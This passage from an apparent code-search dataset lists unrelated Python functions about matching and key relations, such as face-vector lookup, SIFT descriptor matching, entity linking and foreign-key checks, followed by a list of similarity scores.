self._time_distributed_multiply(attentive_vec, w)\n # matching vector, (batch_size, h1_timesteps, mp_dim)\n matching = self._cosine_similarity(h1, attentive_vec)\n return matching", "def match_against_database(list_of_face_vectors):\n\n threshold_of_similarity = 0.4\n\n if len(list_of_face_vectors) != 0:\n #Load the database, if it exists.\n if (file_path/\"names_and_faces.pkl\").exists():\n with open(file_path/\"names_and_faces.pkl\", mode = \"rb\") as opened_file:\n names_and_faces = pickle.load(opened_file)\n\n #Calculate the mean for each key.\n for key in names_and_faces:\n names_and_faces[key] = np.array(names_and_faces[key]).mean(axis = 0)\n\n\n #Here comes the fun part! 
Iterate thru our list of face vectors to find the best candidate name for each face vector.\n face_vectors = np.array(list_of_face_vectors)\n #print(face_vectors.shape)\n names = np.array(list(names_and_faces.keys()))\n faces = np.array(list(names_and_faces.values()))\n candidates = L2_dists_vectorized(face_vectors, faces)\n\n minimum_indices = np.argmin(candidates, axis = 1)\n #print(\"candidates are\", candidates)\n minimum_args = np.min(candidates, axis = 1)\n names_to_return = names[minimum_indices]\n names_to_return[minimum_args > threshold_of_similarity] = \"unknown\"\n\n\n return names_to_return\n\n\n else:\n return 0\n else:\n return 0", "def icontains(self, other):", "def keyDependsOnKey(self, k1Name, k2Name):\n if k1Name == k2Name: return 0\n k1 = self.infoKinds[k1Name]\n k2 = self.infoKinds[k2Name]\n if k1.superNames != k2.superNames:\n allSuperK1 = set()\n toDoK1 = list(k1.superNames)\n allSuperK2 = set()\n toDoK2 = list(k2.superNames)\n while (len(toDoK1) > 0 or len(toDoK2) > 0):\n if len(toDoK1) > 0:\n el1Name = toDoK1.pop()\n if k2Name == el1Name:\n return 1\n el1 = self.infoKinds[el1Name]\n if el1.kindStr in self and not el1.kindStr in allSuperK1:\n toDoK1.append(el1.kindStr)\n for subEl in el1.superNames:\n if not subEl in allSuperK1:\n toDoK1.append(subEl)\n allSuperK1.update(el1.superNames)\n if len(toDoK2) > 0:\n el2Name = toDoK2.pop()\n if k1Name == el2Name:\n return -1\n el2 = self.infoKinds[el2Name]\n if el2.kindStr in self and not el2.kindStr in allSuperK2:\n toDoK2.append(el2.kindStr)\n for subEl in el2.superNames:\n if not subEl in allSuperK2:\n toDoK2.append(subEl)\n allSuperK2.update(el2.superNames)\n return None", "def GetSubkeys(self):", "def test_fkey_nav(dumper, db):\n dumper.reader.load_db(\n db.create_sample(3, fkeys=[(\"table1\", \"t2id\", \"table2\", \"id\")])\n )\n dumper.add_config({\"db_objects\": [{\"name\": \"table1\"}]})\n dumper.perform_dump()\n objs = [obj for obj, match in dumper.writer.dumped if isinstance(obj, Table)]\n assert len(objs) == 2", "def lookup():", "def testBeliefs2sk(self):", "def test_associations(self):\n\n oj = {}\n\n if self.DEBUG:\n print \"Create A\"\n\n # create a\n a = self.save_base_metadata()\n\n oj[a.uuid] = 'A'\n\n if self.DEBUG:\n print \"Create B, point B to A\"\n\n # create b, point b to a\n b = self.save_base_metadata()\n\n oj[b.uuid] = 'B'\n\n b.add_association_to(a)\n\n # save a, b\n b.save()\n a.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, None, None, None)\n\n # test b pointing to a\n self.assertIn(a, b.my_associations)\n # test to see if a is aware of association from b\n # self.assertIn(b, a.associations_to_me)\n\n if self.DEBUG:\n print \"Create C, point C to B\"\n\n # create c, point c to b\n c = self.save_base_metadata()\n\n oj[c.uuid] = 'C'\n\n c.add_association_to(b)\n\n # a.save()\n\n # save b, c\n c.save()\n b.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, c, None, None)\n\n # test c pointing to a\n self.assertIn(a, c.my_associations)\n # test c aware of association from a\n self.assertIn(c, a.associations_to_me)\n\n # test c pointing to b\n self.assertIn(b, c.my_associations)\n # test b aware of association from c\n self.assertIn(c, b.associations_to_me)\n\n if self.DEBUG:\n print \"create D, point to B\"\n\n # create d, point to b\n d = self.save_base_metadata()\n\n oj[d.uuid] = 'D'\n\n d.add_association_to(b)\n\n # a.save()\n\n # save d, b\n d.save()\n b.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, c, d, None)\n\n # test d pointing to a\n self.assertIn(a, d.my_associations)\n # test a 
aware of assoication from d\n self.assertIn(d, a.associations_to_me)\n\n # test d pointing to b\n self.assertIn(b, d.my_associations)\n # test b aware of association from d\n self.assertIn(d, b.associations_to_me)\n\n if self.DEBUG:\n print \"Create E, point to A\"\n\n # create e, point to a\n e = self.save_base_metadata()\n\n oj[e.uuid] = 'E'\n\n e.add_association_to(a)\n\n # save e, a\n e.save()\n a.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, c, d, e)\n\n # test e pointing to a\n self.assertIn(a, e.my_associations)\n # test a aware of association from e\n self.assertIn(b, a.associations_to_me)", "def detail_matching(self):\n paradic = self.cfg['param']['paradic']\n work_dir = self.work_dir\n \n x = float(self.cfg['param']['x']) # selected pixel in the first image\n y = float(self.cfg['param']['y'])\n \n # sift parameters\n # number of bins in the orientation histogram\n n_bins = int(paradic['n_bins']) \n n_hist = int(paradic['n_hist']) \n # descriptor of n_hist X n_hist weighted histograms with n_ori\n n_ori = int(paradic['n_ori']) \n delta_min = float(paradic['delta_min'])\n sigma_min = float(paradic['sigma_min'])\n sigma_in = float(paradic['sigma_in'])\n lambda_ori = float(paradic['lambda_ori'])\n lambda_descr = float(paradic['lambda_descr'])\n #threshold defining reference orientations\n n_spo = int(paradic['n_spo'])\n \n # Read feature vectors from output files\n if (os.path.getsize(work_dir+'OUTmatches.txt') > 0 ):\n pairdata = find_nearest_keypoint(work_dir+'OUTmatches.txt', y, x)\n \n illustrate_pair(pairdata, n_bins, n_hist, n_ori, work_dir)\n\n \n # Read keys coordinates.\n d = 6+n_bins+n_hist*n_hist*n_ori # size of keydata inside pairdata\n v = n_hist*n_hist*n_ori\n [x1, y1, sigma1, theta1] = [float(x) for x in pairdata[0:4]]\n [o1, s1] = [float(x) for x in pairdata[4+v:4+v+2]]\n [x2a, y2a, sigma2a, theta2a] = [float(x) for x in pairdata[d:d+4]]\n [o2a, s2a] = [float(x) for x in pairdata[d+4+v:d+4+v+2]]\n [x2b, y2b, sigma2b, theta2b] = \\\n [float(x) for x in pairdata[2*d:2*d+4]]\n [o2b, s2b] = [float(x) for x in pairdata[2*d+4+v:2*d+4+v+2]]\n \n draw_one_match(pairdata,\n work_dir+'input_0.png',\n work_dir+'input_1.png',\n d,\n lambda_ori,\n lambda_descr,\n n_hist,\n work_dir+'OUTonepair.png')\n \n \n # Extract thumbnails.\n # keypoint 1 (image 1)\n print ' '.join(['demo_extract_patch', work_dir+'input_0.png',\n str(x1), str(y1), str(sigma1), str(theta1), str(o1), str(s1),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im1\"])\n proc = self.run_proc(['demo_extract_patch', work_dir+'input_0.png',\n str(x1), str(y1), str(sigma1), str(theta1), str(o1), str(s1),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im1\"])\n self.wait_proc(proc, timeout=self.timeout)\n \n # keypoint 2a (nearest neighbor in image 2)\n print ' '.join(['demo_extract_patch', work_dir+'input_1.png',\n str(x2a), str(y2a), str(sigma2a), str(theta2a), str(o2a), str(s2a),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im2a\"])\n proc = self.run_proc(['demo_extract_patch', work_dir+'input_1.png',\n str(x2a), str(y2a), str(sigma2a), str(theta2a), str(o2a), str(s2a),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im2a\"])\n self.wait_proc(proc, timeout=self.timeout) \n \n # 
keypoint 2b (second nearest neighbor in image 2)\n proc = self.run_proc(['demo_extract_patch', work_dir+'input_1.png',\n str(x2b), str(y2b), str(sigma2b), str(theta2b), str(o2b), str(s2b),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im2b\"])\n self.wait_proc(proc, timeout=self.timeout) \n \n \n return 1", "def _backreference_keys(self, ref, key_in_ref):\n return (self.__class__.REFERENCE_FIELDS +\n self.__class__.DEPENDENT_LINES +\n self.__class__.OTHER_REFERENCES)", "def additionalMatch(handIn, indx):", "def _candidate_generation(self):\n doc = self.nlp(self.text)\n named_entity_dict = {}\n named_entity_key_list = []\n named_entity_value_list = []\n entity_from_text_list = []\n offline_dic_list = []\n matched_element_list = []\n\n for ent in doc.ents:\n named_entity = (str(ent.text) + ':' + str(ent.label_))\n named_entity = (named_entity.split(':'))\n # named_entity_key = named_entity[0].replace('\\n', '')\n # named_entity_key_list.append(named_entity_key)\n # named_entity_value = named_entity[1].replace('\\n', '')\n # named_entity_value_list.append(named_entity_value)\n named_entity_value = named_entity[1].replace('\\n', '')\n named_entity_value_list.append(named_entity_value)\n filtered_words = (str(ent.text).split())\n filtered_words = [w for w in filtered_words if w.lower() not in self.english_stopwords]\n named_entity_key = [' '.join(filtered_words)]\n for i in named_entity_key:\n named_entity_key_list.append(i)\n for key in named_entity_key_list:\n named_entity_dict[key] = []\n i = 0\n for key in named_entity_key_list:\n named_entity_dict[key].append(named_entity_value_list[i])\n i = i + 1\n\n entities = \"ORG PERSON LOC GPE\".split()\n for entity in entities:\n entity_from_text = [k for k, v in named_entity_dict.items() if entity in v]\n for item in entity_from_text:\n entity_from_text_list.append(item)\n\n if not entity_from_text_list:\n self.logger.info('No named entity found in the input text')\n else:\n self.logger.info('Entities which are identified from the input sentence')\n self.logger.info(entity_from_text_list)\n\n for key, value in self.offline_dic.items():\n offline_dic_list.append(key)\n\n for item in entity_from_text_list:\n for item1 in offline_dic_list:\n if item == item1:\n matched_element_list.append(item)\n\n big_final_dict = []\n for i in matched_element_list:\n candidate_list = [v for k, v in self.offline_dic.items() if str(k) == str(i)]\n final_dict = dict(zip(i.split('\\n'), candidate_list))\n big_final_dict.append(final_dict)\n\n if not big_final_dict:\n self.logger.warning(\"No Match found in the KB\")\n return matched_element_list, None\n else:\n self.logger.info('found entities')\n return matched_element_list, big_final_dict", "def match(desc1, desc2):\n desc1 = array([d/linalg.norm(d) for d in desc1])\n desc2 = array([d/linalg.norm(d) for d in desc2])\n\n dist_ratio = 0.6\n disc1_size = desc1.shape\n\n matchscores = zeros((desc1_size[0]), \"int\")\n desc2t = desc2.T\n for i in range(desc1_size[0]):\n dotprods = dot(desc1[i, :], desc2t)\n dotprods = 0.9999 * dotprods\n\n indx = argsort(arccos(dotprods))\n\n if arccos(dotprods)[indx[0]] < dist_ratio * arccos(dotprods)[indx[1]]:\n matchscores[i] = int(indx[0])\n\n return matchscores", "def allow_relation(self, obj1, obj2, **hints):\n if (\n obj1._meta.label_lower in self.route_encuestas or\n obj2._meta.label_lower in self.route_encuestas\n ):\n return True\n return None", "def 
_create_auto_key(self,identifier2organism={}):\n # when this is a locus in a dbwarehouse, abstract the genomedirname\n realdirname = os.path.realpath(self.dirname)\n if realdirname.find(\"/loci/\") > 0:\n key = os.path.basename(realdirname[0:realdirname.find(\"/loci/\")])\n if key: return key\n # if this point is reached, NOT a locus in dbwarehouse\n # check if we can map the gene's id to an organism ID\n if identifier2organism:\n for identifierpart,organism in identifier2organism.iteritems():\n if self.fref.find(identifierpart) == 0:\n # succesfull mapping\n return organism\n else:\n # mapping was not succesfull\n return self.fref\n else:\n return self.fref", "def __contains__(self, y): # real signature unknown; restored from __doc__\r\n pass", "def targetids(obj, reftype):", "def bipartite_matching(data=None, is_ascend=_Null, threshold=_Null, topk=_Null, out=None, name=None, **kwargs):\n return (0,)", "def match(self, product):\n\n raise NotImplementedError, 'need impletent match method'", "def toggle_ik_fk(*args):\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTab=True)\n\n if current_tab == 'ikTab':\n ik_tab = 1\n else:\n ik_tab = 0\n\n robots = get_robot_roots(1)\n if not robots:\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n \n if ik_tab:\n if pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_ik(robot)\n\n else:\n if not pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_fk(robot)\n \n # Maintain appropriate selections on each robot\n try:\n selection = []\n active_robots = get_robot_roots()\n if active_robots:\n if ik_tab:\n for robot in active_robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.objExists(tool_ctrl_path):\n selection.append(tool_ctrl_path)\n else:\n selection.append(target_ctrl_path)\n else:\n for robot in active_robots:\n selection.append(format_path(__A6_FK_CTRL_PATH, robot))\n \n pm.select(selection)\n else:\n pass\n\n except:\n pm.warning('Error selecting after IK/FK switch')", "def expected_relations():\n reldict = {('project', 'userspec'): ('specs', False),\n ('project', 'userdoc'): ('docs', False),\n ('project', 'userwijz'): ('rfcs', False),\n ('project', 'userprob'): ('probs', False),\n ('project', 'funcdoc'): ('fdocs', False),\n ('project', 'gebrtaak'): ('gtaken', False),\n ('project', 'funcproc'): ('fprocs', False),\n ('project', 'entiteit'): ('fdata', False),\n ('project', 'attribuut'): (None, None),\n ('project', 'techtaak'): ('ttask', False),\n ('project', 'techproc'): ('tproc', False),\n ('project', 'dataitem'): ('tdata', False),\n ('project', 'element'): (None, None),\n ('project', 'layout'): ('layout', False),\n ('project', 'programma'): ('pproc', False),\n ('project', 'testplan'): ('tplan', False),\n ('project', 'testcase'): ('tcase', False),\n ('project', 'bevinding'): ('tbev', False),\n ('userspec', 'project'): ('project', False),\n ('userspec', 'gebrtaak'): ('gtaken', False),\n ('userspec', 'funcproc'): ('fprocs', False),\n ('userdoc', 'project'): ('project', False),\n ('userwijz', 'project'): ('project', False),\n ('userwijz', 'gebrtaak'): ('gtaken', True),\n ('userwijz', 'funcproc'): ('fprocs', True),\n ('userwijz', 'entiteit'): ('fdata', True),\n ('userprob', 'project'): ('project', False),\n ('funcdoc', 'project'): ('project', False),\n ('gebrtaak', 'project'): ('project', False),\n ('gebrtaak', 'userspec'): ('spec', False),\n ('gebrtaak', 'userwijz'): ('rfc', True),\n ('gebrtaak', 
'funcproc'): ('fprocs', True),\n ('gebrtaak', 'techtaak'): ('ttask', False),\n ('gebrtaak', 'layout'): ('layout', True),\n ('gebrtaak', 'testplan'): ('tplan', True),\n ('funcproc', 'project'): ('project', False),\n ('funcproc', 'userspec'): ('spec', False),\n ('funcproc', 'userwijz'): ('rfc', True),\n ('funcproc', 'gebrtaak'): ('gt', True),\n ('funcproc', 'funcproc'): ('used_by', True),\n ('funcproc', 'entiteit'): ('fdata', True),\n ('funcproc', 'techproc'): ('tproc', True),\n ('funcproc', 'testplan'): ('tplan', True),\n ('entiteit', 'project'): ('project', False),\n ('entiteit', 'userwijz'): ('rfc', True),\n ('entiteit', 'funcproc'): ('fp', True),\n ('entiteit', 'attribuut'): ('attrs', False),\n ('entiteit', 'dataitem'): ('tdata', True),\n ('entiteit', 'testplan'): ('tplan', True),\n ('attribuut', 'entiteit'): ('hoort_bij', False),\n ('techtaak', 'project'): ('project', False),\n ('techtaak', 'gebrtaak'): ('gt', False),\n ('techtaak', 'techproc'): ('tproc', True),\n ('techproc', 'project'): ('project', False),\n ('techproc', 'funcproc'): ('fp', True),\n ('techproc', 'techtaak'): ('tt', True),\n ('techproc', 'techproc'): ('used_by', True),\n ('techproc', 'dataitem'): ('tdata', True),\n ('techproc', 'layout'): ('layout', True),\n ('techproc', 'programma'): ('pproc', True),\n ('dataitem', 'project'): ('project', False),\n ('dataitem', 'entiteit'): ('ent', True),\n ('dataitem', 'techproc'): ('tp', True),\n ('element', 'dataitem'): ('hoort_bij', False),\n ('layout', 'project'): ('project', False),\n ('layout', 'gebrtaak'): ('gt', True),\n ('layout', 'techproc'): ('tp', True),\n ('programma', 'project'): ('project', False),\n ('programma', 'techproc'): ('tp', True),\n ('testplan', 'project'): ('project', False),\n ('testplan', 'gebrtaak'): ('gt', True),\n ('testplan', 'funcproc'): ('fp', True),\n ('testplan', 'entiteit'): ('ent', True),\n ('testplan', 'testcase'): ('tcase', True),\n ('testplan', 'bevinding'): ('tbev', True),\n ('testcase', 'project'): ('project', False),\n ('testcase', 'testplan'): ('tplan', True),\n ('bevinding', 'project'): ('project', False),\n ('bevinding', 'testplan'): ('tplan', True)}\n return reldict", "def foreign_key_check(self):\n # MyRocks doesn't support foreign key\n if self.is_myrocks_table:\n log.info(\n \"SKip foreign key check because MyRocks doesn't support \" \"this yet\"\n )\n return True\n foreign_keys = self.query(\n sql.foreign_key_cnt,\n (\n self.table_name,\n self._current_db,\n self.table_name,\n self._current_db,\n ),\n )\n if foreign_keys:\n fk = \"CONSTRAINT `{}` FOREIGN KEY (`{}`) REFERENCES `{}` (`{}`)\".format(\n foreign_keys[0][\"constraint_name\"],\n foreign_keys[0][\"col_name\"],\n foreign_keys[0][\"ref_tab\"],\n foreign_keys[0][\"ref_col_name\"],\n )\n raise OSCError(\n \"FOREIGN_KEY_FOUND\",\n {\"db\": self._current_db, \"table\": self.table_name, \"fk\": fk},\n )" ]
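
Several of the candidate snippets above implement the same core technique: keep a descriptor match only when its nearest neighbor is clearly closer than the second-nearest one (Lowe's ratio test). A minimal NumPy sketch of that idea follows; the function name, the 0.75 threshold, and the synthetic test data are illustrative assumptions, not taken from any snippet above:

import numpy as np

def ratio_test_match(descs1, descs2, ratio=0.75):
    """Return (i, j) index pairs where descs1[i] matches descs2[j].

    A match is kept only if the nearest neighbor in descs2 is clearly
    closer than the second-nearest one (Lowe's ratio test).
    """
    # Pairwise Euclidean distances, shape (len(descs1), len(descs2)).
    diff = descs1[:, None, :] - descs2[None, :, :]
    dists = np.linalg.norm(diff, axis=2)

    matches = []
    for i, row in enumerate(dists):
        order = np.argsort(row)
        nearest, second = row[order[0]], row[order[1]]
        if nearest < ratio * second:
            matches.append((i, int(order[0])))
    return matches

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    d1 = rng.normal(size=(5, 128)).astype(np.float32)
    # Each row of d1 has a near-copy in d2, padded with random distractors.
    d2 = np.vstack([d1 + 0.01, rng.normal(size=(20, 128))]).astype(np.float32)
    print(ratio_test_match(d1, d2))

Brute-force pairwise distances are fine at this scale; the FLANN-based snippets above trade exactness for speed on larger descriptor sets.
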
[ "0.64621747", "0.6233758", "0.6001383", "0.5866673", "0.5858059", "0.57838565", "0.5618625", "0.5599867", "0.55876", "0.55551654", "0.54261523", "0.54143274", "0.54062307", "0.5399775", "0.5396218", "0.5388583", "0.53567606", "0.52986205", "0.52962285", "0.52947336", "0.5270456", "0.52457756", "0.52436656", "0.5234153", "0.5215751", "0.5209741", "0.52039987", "0.51976883", "0.51751417", "0.513496", "0.5124755", "0.51244444", "0.5111415", "0.51066446", "0.5094734", "0.5087002", "0.50820637", "0.50728524", "0.5069215", "0.5069034", "0.5059516", "0.5058986", "0.505482", "0.50440556", "0.50200105", "0.50195944", "0.5015092", "0.49933347", "0.49906576", "0.49774295", "0.49707735", "0.4969237", "0.49641386", "0.49542177", "0.49400368", "0.49381348", "0.49343276", "0.49323833", "0.49271497", "0.49226353", "0.49123183", "0.49109057", "0.49082664", "0.4907925", "0.49060917", "0.49055988", "0.4892699", "0.4889825", "0.48897797", "0.48859495", "0.4878314", "0.48775724", "0.48763362", "0.48691982", "0.4868415", "0.48675773", "0.4866646", "0.48627332", "0.4855944", "0.48543733", "0.48530525", "0.48523977", "0.48483887", "0.48477188", "0.48449484", "0.4842367", "0.4834079", "0.48284882", "0.48250896", "0.48239818", "0.48229423", "0.48184416", "0.48154104", "0.48120958", "0.48113972", "0.48113298", "0.48109913", "0.48106575", "0.48094448", "0.4789479", "0.47865412" ]
0.0
-1
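
Taken together, a record like the one above — candidate snippets, a parallel score list, and two trailing summary values — is typically consumed by zipping candidates with their scores and keeping the highest-scoring few. A placeholder sketch (the sample values below are stand-ins, not the actual record):

candidates = ["def nn_match(descs1, descs2): ...",
              "def match(desc1, desc2): ...",
              "def key_ik(*args): ..."]
scores = [0.646, 0.623, 0.600]

# Sort candidate/score pairs by score, best first, and keep the top two.
top = sorted(zip(scores, candidates), reverse=True)[:2]
for s, snippet in top:
    print(f"{s:.3f}  {snippet[:40]}")
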